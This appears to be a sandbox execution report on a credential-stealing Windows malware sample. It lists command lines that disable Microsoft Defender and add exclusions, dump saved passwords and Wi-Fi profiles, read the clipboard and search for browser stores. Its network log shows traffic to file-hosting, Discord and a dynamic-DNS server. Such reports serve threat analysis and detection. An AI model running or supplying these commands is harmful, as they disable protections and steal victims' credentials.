C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\getPass'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\where.exe
where /r . *.sqlite
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Users\Admin\AppData\Local\Temp\_MEI21802\getPass.exe
getPass.exe /stext pass.txt
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff9747646f8,0x7ff974764708,0x7ff974764718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 /prefetch:2
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.38.43.18:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| FR | 51.38.43.18:443 | api.gofile.io | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | store2.gofile.io | udp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 239.123.112.45.in-addr.arpa | udp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| FR | 45.112.123.239:443 | store2.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | r.bing.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.138:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.154.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 5.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| DE | 140.82.121.9:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 9.121.82.140.in-addr.arpa | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 2.17.251.10:443 | aefd.nelreports.net | tcp |
| US | 2.17.251.10:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 10.251.17.2.in-addr.arpa | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | kackrock.ddns.net | udp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| DE | 142.250.186.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 99.186.250.142.in-addr.arpa | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| DE | 142.250.186.99:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| DK | 62.199.104.190:5656 | kackrock.ddns.net | tcp |
| NL | 23.62.61.194:443 | www.bing.com | udp |
